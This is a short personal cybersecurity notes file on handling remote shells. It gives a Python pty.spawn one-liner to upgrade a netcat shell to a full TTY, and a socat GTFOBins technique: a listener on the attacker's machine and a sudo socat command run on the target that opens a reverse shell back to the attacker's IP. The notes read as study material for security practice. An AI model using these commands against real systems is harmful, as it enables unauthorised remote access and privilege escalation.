FKouhai/cybersecNotes/basicNotes.md

 When we stabblish the first shell with nc it tends not to have a pty which for some porcesses it can be stressful

 to solve that you can run this python adhoc command python -c 'import pty; pty.spawn("/bin/bash")' which gets you a tty that lets you freely run all the commands you need without prompting any error nor warning about not having a tty

+#Socat GTFO bin

+To get a remote shell on a machine using socat you need to run this this is run on your local machine

+socat file:`tty`,raw,echo=0 tcp-listen:$port

+this is run on the remote machine sudo /usr/bin/socat tcp-connect:$yourIP:$yourport exec:sh,pty,stderr,setsid,sigint,sane